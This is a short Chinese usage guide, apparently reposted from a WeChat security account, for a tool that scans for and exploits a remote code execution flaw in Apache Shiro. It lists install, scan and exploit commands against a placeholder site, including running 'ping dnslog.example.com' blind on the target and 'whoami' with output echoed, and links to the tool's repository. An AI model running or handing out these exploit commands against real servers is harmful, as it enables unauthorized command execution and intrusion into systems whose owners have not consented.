===================================
1、安装需要的包
pip install -r requirements.txt
2、检查该漏洞
python ShiroRceTool.py -m scan -u "http://example.com"
3、执行命令 (不回显)
python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com"
4、执行命令(尝试回显)
python ShiroRceTool.py -m exploit -u "http://example.com" -c "whoami" -e
0x03 项目链接下载
https://github.com/Hack3rHan/Shiro-Rce-Tool
https://github.com/Hack3rHan/Shiro-Rce-Tool
原文始发于微信公众号(网络安全者):一个简单的Shiro RCE检测和利用脚本。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论